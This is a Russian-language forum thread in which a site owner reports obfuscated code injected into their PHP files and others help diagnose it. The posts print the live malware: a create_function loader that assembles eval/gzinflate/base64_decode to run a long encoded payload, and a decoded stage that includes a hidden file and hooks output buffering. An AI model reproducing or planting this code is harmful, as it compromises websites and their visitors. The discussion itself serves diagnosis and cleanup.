"левый" код в .php файлах

378
.
заметил что на моих сайтах (один из них на джоне ) во всех файлах какимто образом "левый" код появился что-то типа

$md5 = "1ec95389d940e9ee3b44fd5a21dc00ef";
$ab = array("$","o","e","v","s","d","6","c",'n','l','z',"_",";",'i',"r",")",'a','b','g',"f",'(',"t",'4');
$bb8 = create_function('$'.'v',$ab[2].$ab[3].$ab[16].$ab[9].$ab[20].$ab[18].$ab[10].$ab[13].$ab[8].$ab[19].$ab[9].$ab[16].$ab[21].$ab[2].$ab[20].$ab[17].$ab[16].$ab[4].$ab[2].$ab[6].$ab[22].$ab[11].$ab[5].$ab[2].$ab[7].$ab[1].$ab[5].$ab[2].$ab[20].$ab[0].$ab[3].$ab[15].$ab[15].$ab[15].$ab[12]);
$bb8('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');


из-за него на сайтах "крякообразы". как с ним бороться я не знаю . нагуглил один блог где описивалась такаяже проблема но особо он мне не помог...
.
что то там в base 64, раскодируйте. И дайте ссылку на 'кракозябры'. Вроде код ничего не выводит.
.
mobrating.ru (не джон)
.
╭∩╮ (`-`) ╭∩╮
Такое (попадание левого кода) может быть по нескольким причинам.

1) Одно время ходили вирусы, которые могли воровать данные твоего FTP экаунта на локальном компе и заражать сайты. Но насколько мне не изменяет память, они работали с HTML.

2) Левый код мог попасть из-за уязвимости каких-то твоих скриптов, на сайт залили шелл и далее сам понимаешь.

3) Левый код мог появиться и не по твоей вине, а из-за уязвимости на сервере хостинга.
В частности, если РНР стоит как модуль Apache, то он работает от имени общего экаунта для ВСЕХ сайтов (виртуальных хостов), размещенных на данном сервере. Некоторые контроль-панели имели подобную уязвимость, которой можно было воспользоваться и записать что-то в чужие экаунты.

Если РНР работает как FastCGI, или просто CGI, то такой уязвимости не возникает, ибо работа ведется от имени локального экаунта пользователя. Как дополнительное преимущество данного режима (кроме безопасности) это то, что не надо выставлять права доступа 777 и 666, ибо сервер работает от твоего экаунта. Кроме того, Это дает дополнительную защиту, ибо левые неавторизованные скрипты ничего не смогут залить тебе на сайт.
.
(\/)____o_O____(\/)
много уровней , уже третий пошел на декод
.
почистил все вручную - помогло !но кажется мне что "сдох" мой сайтец
.
Bewahret einander vor Herzeleid
mi3ry (10.09.2012/12:49)
почистил все вручную - помогло !но кажется мне что "сдох" мой сайтец
Было такое. Хостер оказался виновным. Советую сменить пароль.
.
AlkatraZ
╭∩╮ (`-`) ╭∩╮
MyZik (10.09.2012/13:02)
Было такое. Хостер оказался виновным. Советую сменить пароль.
Да, у меня года 4 назад тоже был такой казус из-за уязвимости на сервере хостера.
З.Ы.
Смена пароля не поможет, уязвимость идет через Apache + PHP (как модуль).
.
(\/)____o_O____(\/)
вот
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/p95566/www/mobrating.ru/new/smile/a2f.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
.
(\/)____o_O____(\/)
то что зашифрованно было
Всего: 35